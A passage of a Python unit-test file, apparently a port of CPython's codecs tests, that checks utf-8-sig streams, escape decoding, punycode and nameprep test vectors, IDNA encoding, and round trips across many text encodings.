d = codecs.getincrementaldecoder("utf-8-sig")()
s = "spam"
self.assertEqual(d.decode(s.encode("utf-8-sig")), s)
def test_stream_bom(self):
unistring = "ABC\u00A1\u2200XYZ"
bytestring = codecs.BOM_UTF8 + b"ABC\xC2\xA1\xE2\x88\x80XYZ"
reader = codecs.getreader("utf-8-sig")
for sizehint in [None] + list(range(1, 11)) + \
[64, 128, 256, 512, 1024]:
istream = reader(io.BytesIO(bytestring))
ostream = io.StringIO()
while 1:
if sizehint is not None:
data = istream.read(sizehint)
else:
data = istream.read()
if not data:
break
ostream.write(data)
got = ostream.getvalue()
self.assertEqual(got, unistring)
def test_stream_bare(self):
unistring = "ABC\u00A1\u2200XYZ"
bytestring = b"ABC\xC2\xA1\xE2\x88\x80XYZ"
reader = codecs.getreader("utf-8-sig")
for sizehint in [None] + list(range(1, 11)) + \
[64, 128, 256, 512, 1024]:
istream = reader(io.BytesIO(bytestring))
ostream = io.StringIO()
while 1:
if sizehint is not None:
data = istream.read(sizehint)
else:
data = istream.read()
if not data:
break
ostream.write(data)
got = ostream.getvalue()
self.assertEqual(got, unistring)
@yp_unittest.skip_str_codecs
class EscapeDecodeTest(yp_unittest.TestCase):
def test_empty(self):
self.assertEqual(codecs.escape_decode(b""), (b"", 0))
def test_raw(self):
decode = codecs.escape_decode
for b in range(256):
b = bytes([b])
if b != b'\\':
self.assertEqual(decode(b + b'0'), (b + b'0', 2))
def test_escape(self):
decode = codecs.escape_decode
check = coding_checker(self, decode)
check(b"[\\\n]", b"[]")
check(br'[\"]', b'["]')
check(br"[\']", b"[']")
check(br"[\\]", br"[\]")
check(br"[\a]", b"[\x07]")
check(br"[\b]", b"[\x08]")
check(br"[\t]", b"[\x09]")
check(br"[\n]", b"[\x0a]")
check(br"[\v]", b"[\x0b]")
check(br"[\f]", b"[\x0c]")
check(br"[\r]", b"[\x0d]")
check(br"[\7]", b"[\x07]")
check(br"[\8]", br"[\8]")
check(br"[\78]", b"[\x078]")
check(br"[\41]", b"[!]")
check(br"[\418]", b"[!8]")
check(br"[\101]", b"[A]")
check(br"[\1010]", b"[A0]")
check(br"[\501]", b"[A]")
check(br"[\x41]", b"[A]")
check(br"[\X41]", br"[\X41]")
check(br"[\x410]", b"[A0]")
for b in range(256):
if b not in b'\n"\'\\abtnvfr01234567x':
b = bytes([b])
check(b'\\' + b, b'\\' + b)
def test_errors(self):
decode = codecs.escape_decode
self.assertRaises(ValueError, decode, br"\x")
self.assertRaises(ValueError, decode, br"[\x]")
self.assertEqual(decode(br"[\x]\x", "ignore"), (b"[]", 6))
self.assertEqual(decode(br"[\x]\x", "replace"), (b"[?]?", 6))
self.assertRaises(ValueError, decode, br"\x0")
self.assertRaises(ValueError, decode, br"[\x0]")
self.assertEqual(decode(br"[\x0]\x0", "ignore"), (b"[]", 8))
self.assertEqual(decode(br"[\x0]\x0", "replace"), (b"[?]?", 8))
@yp_unittest.skip_str_codecs
class RecodingTest(yp_unittest.TestCase):
def test_recoding(self):
f = io.BytesIO()
f2 = codecs.EncodedFile(f, "unicode_internal", "utf-8")
f2.write("a")
f2.close()
# Python used to crash on this at exit because of a refcount
# bug in _codecsmodule.c
# From RFC 3492
punycode_testcases = [
# A Arabic (Egyptian):
("\u0644\u064A\u0647\u0645\u0627\u0628\u062A\u0643\u0644"
"\u0645\u0648\u0634\u0639\u0631\u0628\u064A\u061F",
b"egbpdaj6bu4bxfgehfvwxn"),
# B Chinese (simplified):
("\u4ED6\u4EEC\u4E3A\u4EC0\u4E48\u4E0D\u8BF4\u4E2D\u6587",
b"ihqwcrb4cv8a8dqg056pqjye"),
# C Chinese (traditional):
("\u4ED6\u5011\u7232\u4EC0\u9EBD\u4E0D\u8AAA\u4E2D\u6587",
b"ihqwctvzc91f659drss3x8bo0yb"),
# D Czech: Pro<ccaron>prost<ecaron>nemluv<iacute><ccaron>esky
("\u0050\u0072\u006F\u010D\u0070\u0072\u006F\u0073\u0074"
"\u011B\u006E\u0065\u006D\u006C\u0075\u0076\u00ED\u010D"
"\u0065\u0073\u006B\u0079",
b"Proprostnemluvesky-uyb24dma41a"),
# E Hebrew:
("\u05DC\u05DE\u05D4\u05D4\u05DD\u05E4\u05E9\u05D5\u05D8"
"\u05DC\u05D0\u05DE\u05D3\u05D1\u05E8\u05D9\u05DD\u05E2"
"\u05D1\u05E8\u05D9\u05EA",
b"4dbcagdahymbxekheh6e0a7fei0b"),
# F Hindi (Devanagari):
("\u092F\u0939\u0932\u094B\u0917\u0939\u093F\u0928\u094D"
"\u0926\u0940\u0915\u094D\u092F\u094B\u0902\u0928\u0939"
"\u0940\u0902\u092C\u094B\u0932\u0938\u0915\u0924\u0947"
"\u0939\u0948\u0902",
b"i1baa7eci9glrd9b2ae1bj0hfcgg6iyaf8o0a1dig0cd"),
#(G) Japanese (kanji and hiragana):
("\u306A\u305C\u307F\u3093\u306A\u65E5\u672C\u8A9E\u3092"
"\u8A71\u3057\u3066\u304F\u308C\u306A\u3044\u306E\u304B",
b"n8jok5ay5dzabd5bym9f0cm5685rrjetr6pdxa"),
# (H) Korean (Hangul syllables):
("\uC138\uACC4\uC758\uBAA8\uB4E0\uC0AC\uB78C\uB4E4\uC774"
"\uD55C\uAD6D\uC5B4\uB97C\uC774\uD574\uD55C\uB2E4\uBA74"
"\uC5BC\uB9C8\uB098\uC88B\uC744\uAE4C",
b"989aomsvi5e83db1d2a355cv1e0vak1dwrv93d5xbh15a0dt30a5j"
b"psd879ccm6fea98c"),
# (I) Russian (Cyrillic):
("\u043F\u043E\u0447\u0435\u043C\u0443\u0436\u0435\u043E"
"\u043D\u0438\u043D\u0435\u0433\u043E\u0432\u043E\u0440"
"\u044F\u0442\u043F\u043E\u0440\u0443\u0441\u0441\u043A"
"\u0438",
b"b1abfaaepdrnnbgefbaDotcwatmq2g4l"),
# (J) Spanish: Porqu<eacute>nopuedensimplementehablarenEspa<ntilde>ol
("\u0050\u006F\u0072\u0071\u0075\u00E9\u006E\u006F\u0070"
"\u0075\u0065\u0064\u0065\u006E\u0073\u0069\u006D\u0070"
"\u006C\u0065\u006D\u0065\u006E\u0074\u0065\u0068\u0061"
"\u0062\u006C\u0061\u0072\u0065\u006E\u0045\u0073\u0070"
"\u0061\u00F1\u006F\u006C",
b"PorqunopuedensimplementehablarenEspaol-fmd56a"),
# (K) Vietnamese:
# T<adotbelow>isaoh<odotbelow>kh<ocirc>ngth<ecirchookabove>ch\
# <ihookabove>n<oacute>iti<ecircacute>ngVi<ecircdotbelow>t
("\u0054\u1EA1\u0069\u0073\u0061\u006F\u0068\u1ECD\u006B"
"\u0068\u00F4\u006E\u0067\u0074\u0068\u1EC3\u0063\u0068"
"\u1EC9\u006E\u00F3\u0069\u0074\u0069\u1EBF\u006E\u0067"
"\u0056\u0069\u1EC7\u0074",
b"TisaohkhngthchnitingVit-kjcr8268qyxafd2f1b9g"),
#(L) 3<nen>B<gumi><kinpachi><sensei>
("\u0033\u5E74\u0042\u7D44\u91D1\u516B\u5148\u751F",
b"3B-ww4c5e180e575a65lsy2b"),
# (M) <amuro><namie>-with-SUPER-MONKEYS
("\u5B89\u5BA4\u5948\u7F8E\u6075\u002D\u0077\u0069\u0074"
"\u0068\u002D\u0053\u0055\u0050\u0045\u0052\u002D\u004D"
"\u004F\u004E\u004B\u0045\u0059\u0053",
b"-with-SUPER-MONKEYS-pc58ag80a8qai00g7n9n"),
# (N) Hello-Another-Way-<sorezore><no><basho>
("\u0048\u0065\u006C\u006C\u006F\u002D\u0041\u006E\u006F"
"\u0074\u0068\u0065\u0072\u002D\u0057\u0061\u0079\u002D"
"\u305D\u308C\u305E\u308C\u306E\u5834\u6240",
b"Hello-Another-Way--fc4qua05auwb3674vfr0b"),
# (O) <hitotsu><yane><no><shita>2
("\u3072\u3068\u3064\u5C4B\u6839\u306E\u4E0B\u0032",
b"2-u9tlzr9756bt3uc0v"),
# (P) Maji<de>Koi<suru>5<byou><mae>
("\u004D\u0061\u006A\u0069\u3067\u004B\u006F\u0069\u3059"
"\u308B\u0035\u79D2\u524D",
b"MajiKoi5-783gue6qz075azm5e"),
# (Q) <pafii>de<runba>
("\u30D1\u30D5\u30A3\u30FC\u0064\u0065\u30EB\u30F3\u30D0",
b"de-jg4avhby1noc0d"),
# (R) <sono><supiido><de>
("\u305D\u306E\u30B9\u30D4\u30FC\u30C9\u3067",
b"d9juau41awczczp"),
# (S) -> $1.00 <-
("\u002D\u003E\u0020\u0024\u0031\u002E\u0030\u0030\u0020"
"\u003C\u002D",
b"-> $1.00 <--")
]
for i in punycode_testcases:
if len(i)!=2:
print(repr(i))
@yp_unittest.skip_str_codecs
class PunycodeTest(yp_unittest.TestCase):
def test_encode(self):
for uni, puny in punycode_testcases:
# Need to convert both strings to lower case, since
# some of the extended encodings use upper case, but our
# code produces only lower case. Converting just puny to
# lower is also insufficient, since some of the input characters
# are upper case.
self.assertEqual(
str(uni.encode("punycode"), "ascii").lower(),
str(puny, "ascii").lower()
)
def test_decode(self):
for uni, puny in punycode_testcases:
self.assertEqual(uni, puny.decode("punycode"))
puny = puny.decode("ascii").encode("ascii")
self.assertEqual(uni, puny.decode("punycode"))
@yp_unittest.skip_str_codecs
class UnicodeInternalTest(yp_unittest.TestCase):
@yp_unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
def test_bug1251300(self):
# Decoding with unicode_internal used to not correctly handle "code
# points" above 0x10ffff on UCS-4 builds.
ok = [
(b"\x00\x10\xff\xff", "\U0010ffff"),
(b"\x00\x00\x01\x01", "\U00000101"),
(b"", ""),
]
not_ok = [
b"\x7f\xff\xff\xff",
b"\x80\x00\x00\x00",
b"\x81\x00\x00\x00",
b"\x00",
b"\x00\x00\x00\x00\x00",
]
for internal, uni in ok:
if sys.byteorder == "little":
internal = bytes(reversed(internal))
with support.check_warnings():
self.assertEqual(uni, internal.decode("unicode_internal"))
for internal in not_ok:
if sys.byteorder == "little":
internal = bytes(reversed(internal))
with support.check_warnings(('unicode_internal codec has been '
'deprecated', DeprecationWarning)):
self.assertRaises(UnicodeDecodeError, internal.decode,
"unicode_internal")
if sys.byteorder == "little":
invalid = b"\x00\x00\x11\x00"
else:
invalid = b"\x00\x11\x00\x00"
with support.check_warnings():
self.assertRaises(UnicodeDecodeError,
invalid.decode, "unicode_internal")
with support.check_warnings():
self.assertEqual(invalid.decode("unicode_internal", "replace"),
'\ufffd')
@yp_unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
def test_decode_error_attributes(self):
try:
with support.check_warnings(('unicode_internal codec has been '
'deprecated', DeprecationWarning)):
b"\x00\x00\x00\x00\x00\x11\x11\x00".decode("unicode_internal")
except UnicodeDecodeError as ex:
self.assertEqual("unicode_internal", ex.encoding)
self.assertEqual(b"\x00\x00\x00\x00\x00\x11\x11\x00", ex.object)
self.assertEqual(4, ex.start)
self.assertEqual(8, ex.end)
else:
self.fail()
@yp_unittest.skipUnless(SIZEOF_WCHAR_T == 4, 'specific to 32-bit wchar_t')
def test_decode_callback(self):
codecs.register_error("UnicodeInternalTest", codecs.ignore_errors)
decoder = codecs.getdecoder("unicode_internal")
with support.check_warnings(('unicode_internal codec has been '
'deprecated', DeprecationWarning)):
ab = "ab".encode("unicode_internal").decode()
ignored = decoder(bytes("%s\x22\x22\x22\x22%s" % (ab[:4], ab[4:]),
"ascii"),
"UnicodeInternalTest")
self.assertEqual(("ab", 12), ignored)
def test_encode_length(self):
with support.check_warnings(('unicode_internal codec has been '
'deprecated', DeprecationWarning)):
# Issue 3739
encoder = codecs.getencoder("unicode_internal")
self.assertEqual(encoder("a")[1], 1)
self.assertEqual(encoder("\xe9\u0142")[1], 2)
self.assertEqual(codecs.escape_encode(br'\x00')[1], 4)
# From http://www.gnu.org/software/libidn/draft-josefsson-idn-test-vectors.html
nameprep_tests = [
# 3.1 Map to nothing.
(b'foo\xc2\xad\xcd\x8f\xe1\xa0\x86\xe1\xa0\x8bbar'
b'\xe2\x80\x8b\xe2\x81\xa0baz\xef\xb8\x80\xef\xb8\x88\xef'
b'\xb8\x8f\xef\xbb\xbf',
b'foobarbaz'),
# 3.2 Case folding ASCII U+0043 U+0041 U+0046 U+0045.
(b'CAFE',
b'cafe'),
# 3.3 Case folding 8bit U+00DF (german sharp s).
# The original test case is bogus; it says \xc3\xdf
(b'\xc3\x9f',
b'ss'),
# 3.4 Case folding U+0130 (turkish capital I with dot).
(b'\xc4\xb0',
b'i\xcc\x87'),
# 3.5 Case folding multibyte U+0143 U+037A.
(b'\xc5\x83\xcd\xba',
b'\xc5\x84 \xce\xb9'),
# 3.6 Case folding U+2121 U+33C6 U+1D7BB.
# XXX: skip this as it fails in UCS-2 mode
#('\xe2\x84\xa1\xe3\x8f\x86\xf0\x9d\x9e\xbb',
# 'telc\xe2\x88\x95kg\xcf\x83'),
(None, None),
# 3.7 Normalization of U+006a U+030c U+00A0 U+00AA.
(b'j\xcc\x8c\xc2\xa0\xc2\xaa',
b'\xc7\xb0 a'),
# 3.8 Case folding U+1FB7 and normalization.
(b'\xe1\xbe\xb7',
b'\xe1\xbe\xb6\xce\xb9'),
# 3.9 Self-reverting case folding U+01F0 and normalization.
# The original test case is bogus, it says `\xc7\xf0'
(b'\xc7\xb0',
b'\xc7\xb0'),
# 3.10 Self-reverting case folding U+0390 and normalization.
(b'\xce\x90',
b'\xce\x90'),
# 3.11 Self-reverting case folding U+03B0 and normalization.
(b'\xce\xb0',
b'\xce\xb0'),
# 3.12 Self-reverting case folding U+1E96 and normalization.
(b'\xe1\xba\x96',
b'\xe1\xba\x96'),
# 3.13 Self-reverting case folding U+1F56 and normalization.
(b'\xe1\xbd\x96',
b'\xe1\xbd\x96'),
# 3.14 ASCII space character U+0020.
(b' ',
b' '),
# 3.15 Non-ASCII 8bit space character U+00A0.
(b'\xc2\xa0',
b' '),
# 3.16 Non-ASCII multibyte space character U+1680.
(b'\xe1\x9a\x80',
None),
# 3.17 Non-ASCII multibyte space character U+2000.
(b'\xe2\x80\x80',
b' '),
# 3.18 Zero Width Space U+200b.
(b'\xe2\x80\x8b',
b''),
# 3.19 Non-ASCII multibyte space character U+3000.
(b'\xe3\x80\x80',
b' '),
# 3.20 ASCII control characters U+0010 U+007F.
(b'\x10\x7f',
b'\x10\x7f'),
# 3.21 Non-ASCII 8bit control character U+0085.
(b'\xc2\x85',
None),
# 3.22 Non-ASCII multibyte control character U+180E.
(b'\xe1\xa0\x8e',
None),
# 3.23 Zero Width No-Break Space U+FEFF.
(b'\xef\xbb\xbf',
b''),
# 3.24 Non-ASCII control character U+1D175.
(b'\xf0\x9d\x85\xb5',
None),
# 3.25 Plane 0 private use character U+F123.
(b'\xef\x84\xa3',
None),
# 3.26 Plane 15 private use character U+F1234.
(b'\xf3\xb1\x88\xb4',
None),
# 3.27 Plane 16 private use character U+10F234.
(b'\xf4\x8f\x88\xb4',
None),
# 3.28 Non-character code point U+8FFFE.
(b'\xf2\x8f\xbf\xbe',
None),
# 3.29 Non-character code point U+10FFFF.
(b'\xf4\x8f\xbf\xbf',
None),
# 3.30 Surrogate code U+DF42.
(b'\xed\xbd\x82',
None),
# 3.31 Non-plain text character U+FFFD.
(b'\xef\xbf\xbd',
None),
# 3.32 Ideographic description character U+2FF5.
(b'\xe2\xbf\xb5',
None),
# 3.33 Display property character U+0341.
(b'\xcd\x81',
b'\xcc\x81'),
# 3.34 Left-to-right mark U+200E.
(b'\xe2\x80\x8e',
None),
# 3.35 Deprecated U+202A.
(b'\xe2\x80\xaa',
None),
# 3.36 Language tagging character U+E0001.
(b'\xf3\xa0\x80\x81',
None),
# 3.37 Language tagging character U+E0042.
(b'\xf3\xa0\x81\x82',
None),
# 3.38 Bidi: RandALCat character U+05BE and LCat characters.
(b'foo\xd6\xbebar',
None),
# 3.39 Bidi: RandALCat character U+FD50 and LCat characters.
(b'foo\xef\xb5\x90bar',
None),
# 3.40 Bidi: RandALCat character U+FB38 and LCat characters.
(b'foo\xef\xb9\xb6bar',
b'foo \xd9\x8ebar'),
# 3.41 Bidi: RandALCat without trailing RandALCat U+0627 U+0031.
(b'\xd8\xa71',
None),
# 3.42 Bidi: RandALCat character U+0627 U+0031 U+0628.
(b'\xd8\xa71\xd8\xa8',
b'\xd8\xa71\xd8\xa8'),
# 3.43 Unassigned code point U+E0002.
# Skip this test as we allow unassigned
#(b'\xf3\xa0\x80\x82',
# None),
(None, None),
# 3.44 Larger test (shrinking).
# Original test case reads \xc3\xdf
(b'X\xc2\xad\xc3\x9f\xc4\xb0\xe2\x84\xa1j\xcc\x8c\xc2\xa0\xc2'
b'\xaa\xce\xb0\xe2\x80\x80',
b'xssi\xcc\x87tel\xc7\xb0 a\xce\xb0 '),
# 3.45 Larger test (expanding).
# Original test case reads \xc3\x9f
(b'X\xc3\x9f\xe3\x8c\x96\xc4\xb0\xe2\x84\xa1\xe2\x92\x9f\xe3\x8c'
b'\x80',
b'xss\xe3\x82\xad\xe3\x83\xad\xe3\x83\xa1\xe3\x83\xbc\xe3'
b'\x83\x88\xe3\x83\xabi\xcc\x87tel\x28d\x29\xe3\x82'
b'\xa2\xe3\x83\x91\xe3\x83\xbc\xe3\x83\x88')
]
@yp_unittest.skip_str_codecs
class NameprepTest(yp_unittest.TestCase):
def test_nameprep(self):
from encodings.idna import nameprep
for pos, (orig, prepped) in enumerate(nameprep_tests):
if orig is None:
# Skipped
continue
# The Unicode strings are given in UTF-8
orig = str(orig, "utf-8", "surrogatepass")
if prepped is None:
# Input contains prohibited characters
self.assertRaises(UnicodeError, nameprep, orig)
else:
prepped = str(prepped, "utf-8", "surrogatepass")
try:
self.assertEqual(nameprep(orig), prepped)
except Exception as e:
raise support.TestFailed("Test 3.%d: %s" % (pos+1, str(e)))
@yp_unittest.skip_str_codecs
class IDNACodecTest(yp_unittest.TestCase):
def test_builtin_decode(self):
self.assertEqual(str(b"python.org", "idna"), "python.org")
self.assertEqual(str(b"python.org.", "idna"), "python.org.")
self.assertEqual(str(b"xn--pythn-mua.org", "idna"), "pyth\xf6n.org")
self.assertEqual(str(b"xn--pythn-mua.org.", "idna"), "pyth\xf6n.org.")
def test_builtin_encode(self):
self.assertEqual("python.org".encode("idna"), b"python.org")
self.assertEqual("python.org.".encode("idna"), b"python.org.")
self.assertEqual("pyth\xf6n.org".encode("idna"), b"xn--pythn-mua.org")
self.assertEqual("pyth\xf6n.org.".encode("idna"), b"xn--pythn-mua.org.")
def test_stream(self):
r = codecs.getreader("idna")(io.BytesIO(b"abc"))
r.read(3)
self.assertEqual(r.read(), "")
def test_incremental_decode(self):
self.assertEqual(
"".join(codecs.iterdecode((bytes([c]) for c in b"python.org"), "idna")),
"python.org"
)
self.assertEqual(
"".join(codecs.iterdecode((bytes([c]) for c in b"python.org."), "idna")),
"python.org."
)
self.assertEqual(
"".join(codecs.iterdecode((bytes([c]) for c in b"xn--pythn-mua.org."), "idna")),
"pyth\xf6n.org."
)
self.assertEqual(
"".join(codecs.iterdecode((bytes([c]) for c in b"xn--pythn-mua.org."), "idna")),
"pyth\xf6n.org."
)
decoder = codecs.getincrementaldecoder("idna")()
self.assertEqual(decoder.decode(b"xn--xam", ), "")
self.assertEqual(decoder.decode(b"ple-9ta.o", ), "\xe4xample.")
self.assertEqual(decoder.decode(b"rg"), "")
self.assertEqual(decoder.decode(b"", True), "org")
decoder.reset()
self.assertEqual(decoder.decode(b"xn--xam", ), "")
self.assertEqual(decoder.decode(b"ple-9ta.o", ), "\xe4xample.")
self.assertEqual(decoder.decode(b"rg."), "org.")
self.assertEqual(decoder.decode(b"", True), "")
def test_incremental_encode(self):
self.assertEqual(
b"".join(codecs.iterencode("python.org", "idna")),
b"python.org"
)
self.assertEqual(
b"".join(codecs.iterencode("python.org.", "idna")),
b"python.org."
)
self.assertEqual(
b"".join(codecs.iterencode("pyth\xf6n.org.", "idna")),
b"xn--pythn-mua.org."
)
self.assertEqual(
b"".join(codecs.iterencode("pyth\xf6n.org.", "idna")),
b"xn--pythn-mua.org."
)
encoder = codecs.getincrementalencoder("idna")()
self.assertEqual(encoder.encode("\xe4x"), b"")
self.assertEqual(encoder.encode("ample.org"), b"xn--xample-9ta.")
self.assertEqual(encoder.encode("", True), b"org")
encoder.reset()
self.assertEqual(encoder.encode("\xe4x"), b"")
self.assertEqual(encoder.encode("ample.org."), b"xn--xample-9ta.org.")
self.assertEqual(encoder.encode("", True), b"")
@yp_unittest.skip_str_codecs
class CodecsModuleTest(yp_unittest.TestCase):
def test_decode(self):
self.assertEqual(codecs.decode(b'\xe4\xf6\xfc', 'latin-1'),
'\xe4\xf6\xfc')
self.assertRaises(TypeError, codecs.decode)
self.assertEqual(codecs.decode(b'abc'), 'abc')
self.assertRaises(UnicodeDecodeError, codecs.decode, b'\xff', 'ascii')
def test_encode(self):
self.assertEqual(codecs.encode('\xe4\xf6\xfc', 'latin-1'),
b'\xe4\xf6\xfc')
self.assertRaises(TypeError, codecs.encode)
self.assertRaises(LookupError, codecs.encode, "foo", "__spam__")
self.assertEqual(codecs.encode('abc'), b'abc')
self.assertRaises(UnicodeEncodeError, codecs.encode, '\xffff', 'ascii')
def test_register(self):
self.assertRaises(TypeError, codecs.register)
self.assertRaises(TypeError, codecs.register, 42)
def test_lookup(self):
self.assertRaises(TypeError, codecs.lookup)
self.assertRaises(LookupError, codecs.lookup, "__spam__")
self.assertRaises(LookupError, codecs.lookup, " ")
def test_getencoder(self):
self.assertRaises(TypeError, codecs.getencoder)
self.assertRaises(LookupError, codecs.getencoder, "__spam__")
def test_getdecoder(self):
self.assertRaises(TypeError, codecs.getdecoder)
self.assertRaises(LookupError, codecs.getdecoder, "__spam__")
def test_getreader(self):
self.assertRaises(TypeError, codecs.getreader)
self.assertRaises(LookupError, codecs.getreader, "__spam__")
def test_getwriter(self):
self.assertRaises(TypeError, codecs.getwriter)
self.assertRaises(LookupError, codecs.getwriter, "__spam__")
def test_lookup_issue1813(self):
# Issue #1813: under Turkish locales, lookup of some codecs failed
# because 'I' is lowercased as "ı" (dotless i)
oldlocale = locale.setlocale(locale.LC_CTYPE)
self.addCleanup(locale.setlocale, locale.LC_CTYPE, oldlocale)
try:
locale.setlocale(locale.LC_CTYPE, 'tr_TR')
except locale.Error:
# Unsupported locale on this system
self.skipTest('test needs Turkish locale')
c = codecs.lookup('ASCII')
self.assertEqual(c.name, 'ascii')
@yp_unittest.skip_str_codecs
class StreamReaderTest(yp_unittest.TestCase):
def setUp(self):
self.reader = codecs.getreader('utf-8')
self.stream = io.BytesIO(b'\xed\x95\x9c\n\xea\xb8\x80')
def test_readlines(self):
f = self.reader(self.stream)
self.assertEqual(f.readlines(), ['\ud55c\n', '\uae00'])
@yp_unittest.skip_str_codecs
class EncodedFileTest(yp_unittest.TestCase):
def test_basic(self):
f = io.BytesIO(b'\xed\x95\x9c\n\xea\xb8\x80')
ef = codecs.EncodedFile(f, 'utf-16-le', 'utf-8')
self.assertEqual(ef.read(), b'\\\xd5\n\x00\x00\xae')
f = io.BytesIO()
ef = codecs.EncodedFile(f, 'utf-8', 'latin-1')
ef.write(b'\xc3\xbc')
self.assertEqual(f.getvalue(), b'\xfc')
all_unicode_encodings = [
"ascii",
"big5",
"big5hkscs",
"charmap",
"cp037",
"cp1006",
"cp1026",
"cp1125",
"cp1140",
"cp1250",
"cp1251",
"cp1252",
"cp1253",
"cp1254",
"cp1255",
"cp1256",
"cp1257",
"cp1258",
"cp424",
"cp437",
"cp500",
"cp720",
"cp737",
"cp775",
"cp850",
"cp852",
"cp855",
"cp856",
"cp857",
"cp858",
"cp860",
"cp861",
"cp862",
"cp863",
"cp864",
"cp865",
"cp866",
"cp869",
"cp874",
"cp875",
"cp932",
"cp949",
"cp950",
"euc_jis_2004",
"euc_jisx0213",
"euc_jp",
"euc_kr",
"gb18030",
"gb2312",
"gbk",
"hp_roman8",
"hz",
"idna",
"iso2022_jp",
"iso2022_jp_1",
"iso2022_jp_2",
"iso2022_jp_2004",
"iso2022_jp_3",
"iso2022_jp_ext",
"iso2022_kr",
"iso8859_1",
"iso8859_10",
"iso8859_11",
"iso8859_13",
"iso8859_14",
"iso8859_15",
"iso8859_16",
"iso8859_2",
"iso8859_3",
"iso8859_4",
"iso8859_5",
"iso8859_6",
"iso8859_7",
"iso8859_8",
"iso8859_9",
"johab",
"koi8_r",
"koi8_u",
"latin_1",
"mac_cyrillic",
"mac_greek",
"mac_iceland",
"mac_latin2",
"mac_roman",
"mac_turkish",
"palmos",
"ptcp154",
"punycode",
"raw_unicode_escape",
"shift_jis",
"shift_jis_2004",
"shift_jisx0213",
"tis_620",
"unicode_escape",
"unicode_internal",
"utf_16",
"utf_16_be",
"utf_16_le",
"utf_7",
"utf_8",
]
if hasattr(codecs, "mbcs_encode"):
all_unicode_encodings.append("mbcs")
# The following encoding is not tested, because it's not supposed
# to work:
# "undefined"
# The following encodings don't work in stateful mode
broken_unicode_with_streams = [
"punycode",
"unicode_internal"
]
broken_incremental_coders = broken_unicode_with_streams + [
"idna",
]
@yp_unittest.skip_str_codecs
class BasicUnicodeTest(yp_unittest.TestCase, MixInCheckStateHandling):
def test_basics(self):
s = "abc123" # all codecs should be able to encode these
for encoding in all_unicode_encodings:
name = codecs.lookup(encoding).name
if encoding.endswith("_codec"):
name += "_codec"
elif encoding == "latin_1":
name = "latin_1"
self.assertEqual(encoding.replace("_", "-"), name.replace("_", "-"))
with support.check_warnings():
# unicode-internal has been deprecated
(b, size) = codecs.getencoder(encoding)(s)
self.assertEqual(size, len(s), "encoding=%r" % encoding)
(chars, size) = codecs.getdecoder(encoding)(b)
self.assertEqual(chars, s, "encoding=%r" % encoding)
if encoding not in broken_unicode_with_streams:
# check stream reader/writer
q = Queue(b"")
writer = codecs.getwriter(encoding)(q)
encodedresult = b""
for c in s:
writer.write(c)
chunk = q.read()
self.assertTrue(type(chunk) is bytes, type(chunk))
encodedresult += chunk
q = Queue(b"")
reader = codecs.getreader(encoding)(q)
decodedresult = ""
for c in encodedresult:
q.write(bytes([c]))
decodedresult += reader.read()
self.assertEqual(decodedresult, s, "encoding=%r" % encoding)
if encoding not in broken_incremental_coders:
# check incremental decoder/encoder and iterencode()/iterdecode()
try:
encoder = codecs.getincrementalencoder(encoding)()
except LookupError: # no IncrementalEncoder
pass
else:
# check incremental decoder/encoder
encodedresult = b""
for c in s:
encodedresult += encoder.encode(c)
encodedresult += encoder.encode("", True)
decoder = codecs.getincrementaldecoder(encoding)()
decodedresult = ""
for c in encodedresult:
decodedresult += decoder.decode(bytes([c]))
decodedresult += decoder.decode(b"", True)
self.assertEqual(decodedresult, s,
"encoding=%r" % encoding)
# check iterencode()/iterdecode()
result = "".join(codecs.iterdecode(
codecs.iterencode(s, encoding), encoding))
self.assertEqual(result, s, "encoding=%r" % encoding)
# check iterencode()/iterdecode() with empty string
result = "".join(codecs.iterdecode(
codecs.iterencode("", encoding), encoding))
self.assertEqual(result, "")
if encoding not in ("idna", "mbcs"):
# check incremental decoder/encoder with errors argument
try:
encoder = codecs.getincrementalencoder(encoding)("ignore")
except LookupError: # no IncrementalEncoder
pass
else:
encodedresult = b"".join(encoder.encode(c) for c in s)
decoder = codecs.getincrementaldecoder(encoding)("ignore")
decodedresult = "".join(decoder.decode(bytes([c]))
for c in encodedresult)
self.assertEqual(decodedresult, s,
"encoding=%r" % encoding)
@support.cpython_only
def test_basics_capi(self):
from _testcapi import codec_incrementalencoder, codec_incrementaldecoder
s = "abc123" # all codecs should be able to encode these
for encoding in all_unicode_encodings:
if encoding not in broken_incremental_coders:
# check incremental decoder/encoder (fetched via the C API)
try:
cencoder = codec_incrementalencoder(encoding)
except LookupError: # no IncrementalEncoder
pass
else:
# check C API
encodedresult = b""
for c in s:
encodedresult += cencoder.encode(c)
encodedresult += cencoder.encode("", True)
cdecoder = codec_incrementaldecoder(encoding)
decodedresult = ""
for c in encodedresult:
decodedresult += cdecoder.decode(bytes([c]))
decodedresult += cdecoder.decode(b"", True)
self.assertEqual(decodedresult, s,
"encoding=%r" % encoding)
if encoding not in ("idna", "mbcs"):
# check incremental decoder/encoder with errors argument
try:
cencoder = codec_incrementalencoder(encoding, "ignore")
except LookupError: # no IncrementalEncoder
pass
else:
encodedresult = b"".join(cencoder.encode(c) for c in s)
cdecoder = codec_incrementaldecoder(encoding, "ignore")
decodedresult = "".join(cdecoder.decode(bytes([c]))
for c in encodedresult)
self.assertEqual(decodedresult, s,
"encoding=%r" % encoding)
def test_seek(self):
# all codecs should be able to encode these
s = "%s\n%s\n" % (100*"abc123", 100*"def456")
for encoding in all_unicode_encodings:
if encoding == "idna": # FIXME: See SF bug #1163178
continue
if encoding in broken_unicode_with_streams:
continue
reader = codecs.getreader(encoding)(io.BytesIO(s.encode(encoding)))
for t in range(5):
# Test that calling seek resets the internal codec state and buffers
reader.seek(0, 0)
data = reader.read()
self.assertEqual(s, data)
def test_bad_decode_args(self):
for encoding in all_unicode_encodings:
decoder = codecs.getdecoder(encoding)
self.assertRaises(TypeError, decoder)
if encoding not in ("idna", "punycode"):
self.assertRaises(TypeError, decoder, 42)
def test_bad_encode_args(self):
for encoding in all_unicode_encodings:
encoder = codecs.getencoder(encoding)
with support.check_warnings():
# unicode-internal has been deprecated
self.assertRaises(TypeError, encoder)
def test_encoding_map_type_initialized(self):
from encodings import cp1140
# This used to crash, we are only verifying there's no crash.
table_type = type(cp1140.encoding_table)
self.assertEqual(table_type, table_type)
def test_decoder_state(self):
# Check that getstate() and setstate() handle the state properly
u = "abc123"
for encoding in all_unicode_encodings:
if encoding not in broken_incremental_coders:
self.check_state_handling_decode(encoding, u, u.encode(encoding))
self.check_state_handling_encode(encoding, u, u.encode(encoding))
